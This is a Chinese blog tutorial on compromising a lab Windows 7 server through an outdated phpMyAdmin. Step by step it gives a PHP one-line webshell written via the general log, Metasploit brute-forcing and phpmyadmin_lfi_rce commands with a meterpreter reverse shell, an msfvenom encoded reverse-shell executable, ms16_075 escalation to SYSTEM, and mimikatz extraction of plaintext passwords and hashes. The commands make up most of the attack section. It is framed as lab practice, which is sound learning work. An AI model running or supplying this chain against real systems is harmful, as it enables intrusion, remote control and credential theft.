Web渗透小案例——利用MSF拿下phpmyadmin的windows服务器system权限并读取管理员密码

最新推荐文章于 2025-04-02 13:40:12 发布
最新推荐文章于 2025-04-02 13:40:12 发布
阅读量2.6k 收藏 13
点赞数 5
分类专栏: Web渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Mr_Wanderer/article/details/107875737
版权

文章目录

配置靶机

靶机操作系统选择windows7或者windows service 2008都可以,本文中我使用windows7虚拟机作为靶机。

新建低权限用户

为了增加攻击难度,我们在靶机上新建低权限用户,并用这个用户的权限去配置php环境。

net user as 123456… /add
net user [用户名] [密码] /add

安装phpstudy

我使用的是2018版本的phpstudy(其他版本也可),可在phpstudy官网下载
phpstudy可能需要一些环节配置,很简单,相关的安装包下载地址如下:

链接:https://pan.baidu.com/s/1yaFBw2t5Nl61DdoQGF_jyw
提取码:mvtt

为phpstudy相关服务分配权限

设置mysql权限

mysql的date文件夹 --> 属性 --> 安全 --> 编辑 --> 添加
在这里插入图片描述
添加权限,并应用
在这里插入图片描述

设置Apache权限

Apache文件夹下的logs文件夹 --> 属性
在这里插入图片描述

设置apache和MySQLa服务

服务中找到apche
在这里插入图片描述
属性 --> 登录
在这里插入图片描述
选用此账户,指定我们新建的低权限账户
MySQLa服务进行同样的设置
在这里插入图片描述
设置成功后,apache和mysql运行在as用户中
在这里插入图片描述

更换phpmyadmin版本

新版本的phpmyadmin中已经没有这个漏洞了。旧版的phpmyadmin下载地址如下

链接:https://pan.baidu.com/s/1XWH0nf_XsOZCMMlWkhE1mg
提取码:xiha

解压后放在phpstudy\PHPTutorial\WWW目录下

漏洞原理

登录phpmyadmin后,开启general log,并设置文件位置
在这里插入图片描述
这个时候,只要我们在sql模块输入一句话木马

SELECT “<?php @eval($_REQUEST[a]);?>”

在这里插入图片描述
这句话就会被写入www目录下的log1.php中,我们传参a=phpinfo();就会显示
在这里插入图片描述之后我们就可连接菜刀或者蚁剑。

使用MSF进行漏洞利用

打开msf

开启数据库:

service postgresql start

初始化msf数据库(第一次使用msf需要):

msfdb init

开启MSF:

msfconsole

爆破靶机密码

选择密码爆破模块:

use auxiliary/scanner/http/phpmyadmin_login

设置参数并运行:

set pass_file ~/Desktop/small.txt
set rhosts 192.168.83.156 (目标主机ip)
set targeturi /phpMyAdmin/index.php (目标主机phpmyadmin登录目录)
set threads 2 (设置进程数)
run

在这里插入图片描述得到了账号和密码:root:root
在这里插入图片描述

利用phpmyadmin漏洞进行攻击

选择对应的攻击模块

use exploit/multi/http/phpmyadmin_lfi_rce

设置参数和payload:

set rhosts 192.168.83.156 (设置目标主机ip)
set password root (设置目标主机phpmyadmin密码)
set payload php/meterpreter/reverse_tcp
set lhost 192.168.83.157 (设置攻击机机ip)
set lport 1250 (设置靶机连接攻击机的端口)
run

在这里插入图片描述攻击成功。

建立稳定连接

此时是php连接,并不稳定,我们可以丢一个木马进去,用它进行连接。
在这里插入图片描述

生成反向连接木马

新打开一个终端(终端二)
生成一个简单的木马:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.83.157 lport=1250 -f exe > shell.exe

还有很多木马生成方式,以及免杀木马,在我的另一篇文章:
https://blog.youkuaiyun.com/Mr_Wanderer/article/details/107872350
在这里插入图片描述

攻击机开启端口监听,等待靶机连接攻击机

打开msf,并选择端口监听模块:

msfconsole
use exploit/multi/handler

设置参数:

set payload windows/meterpreter/reverse_tcp
set lhost 192.168.83.157
set lport 1250
(ip和端口要与生成木马时所用的本机ip和端口一致)

开启监听:

run

在这里插入图片描述

上传木马并运行

在之前的终端中(终端一)
上传木马:

upload shell.exe

在这里插入图片描述

查看是否上传成功:

dir

运行木马:

execute -f shell.exe

在这里插入图片描述
之后终端二会收到连接请求,并建立连接。
在这里插入图片描述
此时已是windows连接,较为稳定,但是目前是普通用户权限。
在这里插入图片描述获取system权限失败。

提权

先把会话放到后台(终端二)

background

查看会话列表

sessions -l

在这里插入图片描述
选择提权模块,设置参数并运行:

use exploit/windows/local/ms16_075_reflection_juicy
set session 1
run

在这里插入图片描述
成功。
在这里插入图片描述
现在已是system权限。

获取管理员账号和密码

加载mimikatz

我们使用MSF中的mimikatz。
加载mimika:

load mimikatz

在这里插入图片描述
读取明文密码:

kerberos

获取hash值:

msv

在这里插入图片描述
有乱码,且更改了终端字符编码为简体中文后,还是有乱码
在这里插入图片描述
这是因为我们用提权补丁得到的会话,与mimikatz不兼容。此时可以通过迁移进程来解决乱码问题。

迁移进程

查看进程:

ps

选择一个有system权限的进程,比如services.exe
在这里插入图片描述
迁移进程:

migrate 568

在这里插入图片描述
之后再次获取明文密码和hash值,不再有乱码。
在这里插入图片描述
在这里插入图片描述

写在最后

亲测可行。如果本文有帮到您,求点赞留言~

如果有任何疑问,请私信我

渗透测试之突破口——web服务突破
m0_61506558的博客
10-17 723
任意用户注册可爆破用户名爆破用户名,密码用户名注入万能密码用户名Xss修改返回包信息,登入他人账户修改cookie中的参数,如user,adminid等HTML源码、JS等查看信息搜集一章后台登录参数修改为注册参数/reg、/register、/sign等密码重置1.重置一个账户,不发送验证码,设置验证码为空发送请求。2.发送验证码,查看相应包3.验证码生存期的爆破4.修改相应包为成功的相应包5.手工直接跳转到校验成功的界面。
phpmyadmin中mysql返回_phpMyAdmin利用小结
weixin_28981373的博客
01-28 438
获取版本信息在phpmyadmin根目录下后面添加:READMEChangeLogdoc/html/index.htmlChangechangelog.phpreadme.phpDocumetation.htmlDocumetation.txttranslators.html在fofa上搜索相应站点进行测试:常规getshell手段:1、SQL注入:看看网站是否存在注入利用注入出来的账号密码登录2...
web渗透实例
12-08
一次艰难的渗透纪实,不容错过,真实web入侵纪实!
Web完整渗透测试实例
热门推荐
chaojixiaojingang
10-10 3万+
学习一整套的web渗透测试实验对以后的测试工作很有帮助,所以我把学习环境中的实现写下来,提供对整个网站测试的经验。 目的: (1)了解黑客是如何通过漏洞入侵网站,获得服务器权限; (2)学习渗透测试完整过程原理:       黑客通过挖掘网站的注入漏洞,进而获得管理员账号密码进去后台,通过数据库备份,拿到webshell;然后黑客登录shell,通过2003服务器的提权exp拿下服务器权限。...
40个漏洞挖掘实战清单,覆盖90%渗透场景!丛零基础到精通,收藏这篇就够了!
最新发布
Libra1313的博客
04-02 967
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。实战的时候,一定要结合自动化工具(比如Burp Suite、SQLMap)和手动测试,最重要的是,因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。各位靓仔,搞网络安全的都知道,
Web渗透案例——利用Metasploit(MSF拿下Windows7
Mr_Wanderer的博客
08-01 751
文章目录开启MSF攻击开始使用Auxiliary辅助模块嗅探目标选择和设置攻击模块运行攻击脚本拿下服务器后的工作关闭靶机防火墙拿到shell权限 开启MSF 开启数据库: service postgresql start 初始化msf数据库(第一次使用msf需要): msfdb init 开启MSFmsfconsole 查看数据连接状态: db_status 攻击开始 使用Auxiliary辅助模块嗅探目标 选择模块: use auxiliary/scanner/smb/smb_
WEB渗透实战
m0_57929980的博客
06-25 9105
WEB渗透实战篇:介绍文件上传漏洞、跨站脚本攻击、SQL注入漏洞、文件包含漏洞、反序列化漏洞原理及利用
web渗透常见攻击实例
luqi5的博客
12-16 3753
随笔,总结一下经常挖到和遇到或者危害性较大的漏洞,希望大家能留言查漏补缺 SQL注入,自学——>SQL注入详解 XML注入,自学——>XML注入详解 .git库.svn库.rar压缩等,自学——>敏感信息详解 XSS跨站脚本,自学——>XSS(跨站脚本)漏洞详解 XXE漏洞,自学——>XXE(XML外部实体注入)漏洞 目标遍历,自学——>信息收集,fofa测试查找路径穿越获取目标目录 cookie类型,自学——>是否注销和劫持漏洞 url跳转,自学——>dns
网络安全渗透测试——名词解释
weixin_43778463的博客
10-12 3881
常用术语解释
Web安全攻防渗透测试实战指南笔记 三
Ren59421的博客
04-05 8518
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程...
WEB到内网横向&&CS后渗透&&MSF渗透&&哈希传递------ATK&CK红队评估(一)
2301_77902563的博客
09-18 702
ATK&CK红队评估(一)
E004-渗透测试常用工具-使用MSF实现Web传递获取靶机权限.pdf
12-02
E004-渗透测试常用工具-使用MSF实现Web传递获取靶机权限
渗透实战:内网域渗透
kali_Ma的博客
11-22 3万+
前言 本文记录了一次针对具有二层内网的域环境进行渗透测试的过程,文中涉及了内网域渗透的基本方法、思路和技巧。交替使用了msf、CobaltStrike、frp、chisel、SharpSQLTools等工具,最后通过约束委派拿下了域控。其间运用了很多小工具,文章较长,下面开始此次渗透长途之旅。 网络拓扑如下: web服务器 先来波端口扫描: 直接发现了内网的ip,这里需要提前说明一点,由于靶场搭建的问题,weblogic只在10.10.20.12这个ip上才能解析,所以需要调整下ip设置,等做完web
一个简单的Web渗透(文件上传漏洞)
yxngu
03-14 4076
本篇文章仅供学习参考,切勿用作非法用途。 进入正题 本来想写的粗略一点,但是回想起来自己当初学习的时候,一个小问题都能纠结半天,所以本白决定从开天辟地开始写起,今天这个渗透利用文件上传的漏洞,这里采用最广泛的头像上传图片的漏洞进行渗透。首先渗透肯定是需要工具的,所以您需要准备以下工具: 1:burp suit. (主要是使用Proxy模块抓包) 2:firefox浏览器(个人喜好,主要使用代理...
Web渗透实例复现(一)(通达OA11.2)
InterplanetaryW的博客
07-13 2393
以通达OA系统11.2版本为案例Web渗透 1. 渗透背景: 目标站点:VM虚拟机 O A 版本:通达OA系统11.2 目标系统:Windows server 2008 R2 SP1 威胁等级:高危 渗透工具:BurpSuite pro、SeayDzend、TongDaOA-Fake-User、PHPstorm、蚁剑、VMware 2. 存在漏洞 前台任意用户登录漏洞 前台未授权访问漏洞 管理后台文件上传漏洞 后台SQL注入漏洞 文件包含getshell 3. 漏洞复现 3.1 前台任意用户登录漏洞
msf php,Metasploit溢出phpMyAdmin漏洞
weixin_39817391的博客
03-09 274
利用phpMyAdmin漏洞上传***程序,获得webshell。CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程***者在请求参数中插入执行命令。一、利用nmap工具扫描目标主机1.1使用nmap命令对目标主机进行扫描。单击桌面空白处,右键菜单选择“在终端中打开”。1.2在终端中输入命令“nmap –sV 192.168.1.3”,对目标主机进行端口扫描,发现开放80端口。1.3在浏览...
phpmyadmin mysql提权_phpMyadmin提权那些事
weixin_34603814的博客
01-20 253
phpMyadmin提权那些事引言:在渗透测试过程中获知到phpMyadmin的账号密码,如何进行提权呢?往下看,我今天和你说说phpMyadmin提权那些事。0x00 定义​ phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。0x01 环境准备目标: Windows Serve...
phpMyAdmin提权
Clannad的博客
01-10 1818
文章目录条件 条件 1、secure_file_priv的值不为NULL
phpmyadmin的提权
cc1988429的专栏
10-13 900
一: 暴路径: libraries/lect_lang.lib.php themes/darkblue_orange/layout.inc.php 二:提权 选择一个Database.运行以下语句. ----start code--- Create TABLE a (cmd text NOT NULL); Insert INTO a (cmd) VALUES(''''); sel
Web渗透面试精华:MSF与Burp工具详解与信息收集策略
Web渗透测试面试集锦中,主要关注两个核心部分:MSF(Metasploit Framework)和Burp Suite的使用,以及渗透测试中的信息收集与漏洞扫描策略。 1. MSF与Burp Suite相关问题: - Burp Suite 是一款强大的Web应用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值